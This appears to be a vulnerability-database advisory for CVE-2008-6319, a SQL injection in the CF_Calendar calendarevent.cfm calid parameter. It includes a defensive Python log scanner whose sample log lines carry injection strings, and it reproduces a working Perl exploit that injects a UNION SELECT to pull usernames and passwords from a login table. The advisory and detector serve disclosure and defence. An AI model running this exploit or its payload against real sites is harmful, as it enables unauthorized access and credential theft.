CFMSource CF_Calendar 'calendarevent.cfm' SQL Injection Vulnerability

Vulnerability ID: 1116993
Vulnerability type: SQL injection
Published: 2008-12-10
Updated: 2009-02-27
CVE ID: CVE-2008-6319
CNNVD-ID: CNNVD-200902-636
Platform: ASP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7413
https://cxsecurity.com/issue/WLB-2009030088
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-636
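|Vulnerability details
CF_Calendar is a calendar template for an application server platform. A SQL injection vulnerability exists in calendarevent.cfm of CF_Calendar. Remote attackers can execute arbitrary SQL commands via the calid parameter.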
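For defenders reviewing web server logs for requests against this parameter, the following is an added example (not part of the original advisory or of CF_Calendar) that flags requests to calendarevent.cfm whose calid value is not a plain integer. It assumes calid is a numeric calendar id and that logs are in combined log format; the log lines, paths and addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: calid is a numeric calendar id, so any other value is suspect.
NUMERIC = re.compile(r"[0-9]+")
SQL_TOKENS = re.compile(r"\b(union|select|concat|from)\b|0x[0-9a-f]{4,}", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2008:10:00:01 +0000] '
    '"GET /calendar/calendarevent.cfm?calid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Dec/2008:10:02:13 +0000] '
    '"GET /calendar/calendarevent.cfm?calid=0+union+select+1,2,3+from+login HTTP/1.1" 200 6010',
    '198.51.100.7 - - [10/Dec/2008:10:02:40 +0000] '
    '"GET /calendar/calendarevent.cfm?CALID=12%27 HTTP/1.1" 500 900',
    '192.0.2.11 - - [10/Dec/2008:10:05:00 +0000] '
    '"GET /index.cfm?calid=abc HTTP/1.1" 200 100',
]

def check_line(line):
    """Return (decoded calid, reason) for a suspicious request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1].lower() != "calendarevent.cfm":
        return None
    # parse_qs decodes %xx and '+'; keys are lower-cased because
    # ColdFusion URL variable names are case-insensitive.
    query = parse_qs(url.query, keep_blank_values=True)
    params = {k.lower(): v for k, v in query.items()}
    for value in params.get("calid", []):
        if NUMERIC.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_TOKENS.search(value) else "non-numeric"
        return value, reason
    return None

def scan(lines):
    """Return [(line number, decoded calid, reason)] for every flagged line."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := check_line(line))]

if __name__ == "__main__":
    for n, value, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}: calid={value!r}")
```

The same integer-only rule, enforced in the application through input validation and parameterized queries, is what removes the injection point; log matching only surfaces attempts.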
|Exploit
#!/usr/bin/perl


use HTTP::Request;
use LWP::UserAgent;



print "\n ********************************************\n";
print " * CF_Calendar Remote SQL Injection Exploit *\n";
print " *       By AlpHaNiX                        *\n";
print " ********************************************\n";
print " ********************************************\n";
print " * usage : perl exploit.pl target           *\n";
print " *  contact : AlpHa[AT]HACKER[DOT]BZ        *\n";
print " ********************************************\n";



$alpha1 = "calendarevent.cfm?calid=";
$alpha2 = "0+union+select+1,concat(0x20616c7068616e69787761736865726520,username,0x20616e642070617373776f7264206973203a20,password,0x20616c7068616e69787761736865726520),3,4,null,6,7,8,9+from+login";



if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; }
print " Working on it\n\n";

my $alpha3 = $target.$alpha1.$alpha2;
my $request   = HTTP::Request->new(GET=>$alpha3);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
        my $res   = $response->content;
        if ($res =~ m/ alphanixwashere (.*)and password is : (.*) alphanixwashere /g) {
                my ($username,$passwd) = ($1,$2);
                print "Username : $username \n\n  password : $passwd  \n\n"

        }
        else { print " operation failed \n\n"; }
}
else { print "  Error, ".$response->status_line."\n\n"; }

# milw0rm.com [2008-12-10]
|References

Source: BID
Name: 32766
Link: http://www.securityfocus.com/bid/32766
Source: MILW0RM
Name: 7413
Link: http://www.milw0rm.com/exploits/7413
Source: SECUNIA
Name: 33074
Link: http://secunia.com/advisories/33074